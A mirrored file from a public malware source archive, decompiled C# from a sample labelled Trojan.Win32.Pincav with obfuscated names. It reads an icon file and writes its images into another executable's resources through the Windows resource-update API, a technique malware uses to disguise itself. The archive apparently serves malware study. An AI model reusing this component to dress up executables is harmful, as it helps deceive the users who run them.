mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
f2ac1ece55
add
196 lines
6.5 KiB
C#
196 lines
6.5 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type:
|
||
// Assembly: Random, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 29923E1C-4A06-46C3-B41C-690DFD9D7396
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Pincav.cmfl-3fa99ddd788dbbe91390f940f247e68ee6ef463b9a024c2781a0267f9ccc9501.exe
|
||
|
||
using System;
|
||
using System.Diagnostics;
|
||
using System.IO;
|
||
using System.Runtime.InteropServices;
|
||
using System.Security;
|
||
|
||
public sealed class \u0006
|
||
{
|
||
[DebuggerNonUserCode]
|
||
public \u0006()
|
||
{
|
||
}
|
||
|
||
public static void \u0002(string _param0, string _param1) => \u0006.\u0002(_param0, _param1, 1U, 1U);
|
||
|
||
public static void \u0002(string _param0, string _param1, uint _param2, uint _param3)
|
||
{
|
||
\u0006.\u000E obj = \u0006.\u000E.\u0002(_param1);
|
||
IntPtr num1 = \u0006.\u0002.\u0002(_param0, false);
|
||
byte[] numArray1 = obj.\u0002(_param3);
|
||
IntPtr num2 = num1;
|
||
IntPtr num3 = new IntPtr(14L);
|
||
IntPtr num4 = num3;
|
||
IntPtr num5 = new IntPtr((long) _param2);
|
||
IntPtr num6 = num5;
|
||
byte[] numArray2 = numArray1;
|
||
int length1 = numArray1.Length;
|
||
\u0006.\u0002.\u0002(num2, num4, num6, (short) 0, numArray2, length1);
|
||
int num7 = checked (obj.\u0002() - 1);
|
||
int num8 = 0;
|
||
while (num8 <= num7)
|
||
{
|
||
byte[] numArray3 = obj.\u0002(num8);
|
||
IntPtr num9 = num1;
|
||
num5 = new IntPtr(3L);
|
||
IntPtr num10 = num5;
|
||
num3 = new IntPtr(checked ((long) _param3 + (long) num8));
|
||
IntPtr num11 = num3;
|
||
byte[] numArray4 = numArray3;
|
||
int length2 = numArray3.Length;
|
||
\u0006.\u0002.\u0002(num9, num10, num11, (short) 0, numArray4, length2);
|
||
checked { ++num8; }
|
||
}
|
||
\u0006.\u0002.\u0002(num1, false);
|
||
}
|
||
|
||
[SuppressUnmanagedCodeSecurity]
|
||
private sealed class \u0002
|
||
{
|
||
[DebuggerNonUserCode]
|
||
public \u0002()
|
||
{
|
||
}
|
||
|
||
[DllImport("kernel32", EntryPoint = "BeginUpdateResource")]
|
||
public static extern IntPtr \u0002(string _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
|
||
|
||
[DllImport("kernel32", EntryPoint = "UpdateResource")]
|
||
[return: MarshalAs(UnmanagedType.Bool)]
|
||
public static extern bool \u0002(
|
||
IntPtr _param0,
|
||
IntPtr _param1,
|
||
IntPtr _param2,
|
||
short _param3,
|
||
[MarshalAs(UnmanagedType.LPArray, SizeParamIndex = 5)] byte[] _param4,
|
||
int _param5);
|
||
|
||
[DllImport("kernel32", EntryPoint = "EndUpdateResource")]
|
||
[return: MarshalAs(UnmanagedType.Bool)]
|
||
public static extern bool \u0002(IntPtr _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
|
||
}
|
||
|
||
private struct \u0003
|
||
{
|
||
public ushort \u0002;
|
||
public ushort \u0003;
|
||
public ushort \u0005;
|
||
}
|
||
|
||
private struct \u0005
|
||
{
|
||
public byte \u0002;
|
||
public byte \u0003;
|
||
public byte \u0005;
|
||
public byte \u0008;
|
||
public ushort \u0006;
|
||
public ushort \u000E;
|
||
public int \u000F;
|
||
public int \u0002\u2000;
|
||
}
|
||
|
||
[StructLayout(LayoutKind.Sequential, Pack = 2)]
|
||
private struct \u0006
|
||
{
|
||
public byte \u0002;
|
||
public byte \u0003;
|
||
public byte \u0005;
|
||
public byte \u0008;
|
||
public ushort \u0006;
|
||
public ushort \u000E;
|
||
public int \u000F;
|
||
public ushort \u0002\u2000;
|
||
}
|
||
|
||
private struct \u0008
|
||
{
|
||
public uint \u0002;
|
||
public int \u0003;
|
||
public int \u0005;
|
||
public ushort \u0008;
|
||
public ushort \u0006;
|
||
public uint \u000E;
|
||
public uint \u000F;
|
||
public int \u0002\u2000;
|
||
public int \u0003\u2000;
|
||
public uint \u0005\u2000;
|
||
public uint \u0008\u2000;
|
||
}
|
||
|
||
private sealed class \u000E
|
||
{
|
||
private \u0006.\u0003 \u0002;
|
||
private \u0006.\u0005[] \u0003;
|
||
private byte[][] \u0005;
|
||
|
||
private \u000E() => this.\u0002 = new \u0006.\u0003();
|
||
|
||
public int \u0002() => (int) this.\u0002.\u0005;
|
||
|
||
public byte[] \u0002(int _param1) => this.\u0005[_param1];
|
||
|
||
public static \u0006.\u000E \u0002(string _param0)
|
||
{
|
||
\u0006.\u000E obj = new \u0006.\u000E();
|
||
byte[] src = File.ReadAllBytes(_param0);
|
||
GCHandle gcHandle = GCHandle.Alloc((object) src, GCHandleType.Pinned);
|
||
obj.\u0002 = (\u0006.\u0003) Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), typeof (\u0006.\u0003));
|
||
obj.\u0003 = new \u0006.\u0005[checked ((int) obj.\u0002.\u0005 - 1 + 1)];
|
||
obj.\u0005 = new byte[checked ((int) obj.\u0002.\u0005 - 1 + 1)][];
|
||
int num1 = Marshal.SizeOf((object) obj.\u0002);
|
||
Type type = typeof (\u0006.\u0005);
|
||
int num2 = Marshal.SizeOf(type);
|
||
int num3 = checked ((int) obj.\u0002.\u0005 - 1);
|
||
int index = 0;
|
||
while (index <= num3)
|
||
{
|
||
\u0006.\u0005 structure = (\u0006.\u0005) Marshal.PtrToStructure(new IntPtr(checked (gcHandle.AddrOfPinnedObject().ToInt64() + (long) num1)), type);
|
||
obj.\u0003[index] = structure;
|
||
obj.\u0005[index] = new byte[checked (structure.\u000F - 1 + 1)];
|
||
Buffer.BlockCopy((Array) src, structure.\u0002\u2000, (Array) obj.\u0005[index], 0, structure.\u000F);
|
||
checked { num1 += num2; }
|
||
checked { ++index; }
|
||
}
|
||
gcHandle.Free();
|
||
return obj;
|
||
}
|
||
|
||
public byte[] \u0002(uint _param1)
|
||
{
|
||
byte[] numArray = new byte[checked (Marshal.SizeOf(typeof (\u0006.\u0003)) + Marshal.SizeOf(typeof (\u0006.\u0006)) * this.\u0002() - 1 + 1)];
|
||
GCHandle gcHandle1 = GCHandle.Alloc((object) numArray, GCHandleType.Pinned);
|
||
Marshal.StructureToPtr((object) this.\u0002, gcHandle1.AddrOfPinnedObject(), false);
|
||
int num1 = Marshal.SizeOf((object) this.\u0002);
|
||
int num2 = checked (this.\u0002() - 1);
|
||
int index = 0;
|
||
while (index <= num2)
|
||
{
|
||
\u0006.\u0006 structure = new \u0006.\u0006();
|
||
\u0006.\u0008 obj = new \u0006.\u0008();
|
||
GCHandle gcHandle2 = GCHandle.Alloc((object) obj, GCHandleType.Pinned);
|
||
Marshal.Copy(this.\u0002(index), 0, gcHandle2.AddrOfPinnedObject(), Marshal.SizeOf(typeof (\u0006.\u0008)));
|
||
gcHandle2.Free();
|
||
structure.\u0002 = this.\u0003[index].\u0002;
|
||
structure.\u0003 = this.\u0003[index].\u0003;
|
||
structure.\u0005 = this.\u0003[index].\u0005;
|
||
structure.\u0008 = this.\u0003[index].\u0008;
|
||
structure.\u0006 = obj.\u0008;
|
||
structure.\u000E = obj.\u0006;
|
||
structure.\u000F = this.\u0003[index].\u000F;
|
||
structure.\u0002\u2000 = checked ((ushort) ((long) _param1 + (long) index));
|
||
Marshal.StructureToPtr((object) structure, new IntPtr(checked (gcHandle1.AddrOfPinnedObject().ToInt64() + (long) num1)), false);
|
||
checked { num1 += Marshal.SizeOf(typeof (\u0006.\u0006)); }
|
||
checked { ++index; }
|
||
}
|
||
gcHandle1.Free();
|
||
return numArray;
|
||
}
|
||
}
|
||
}
|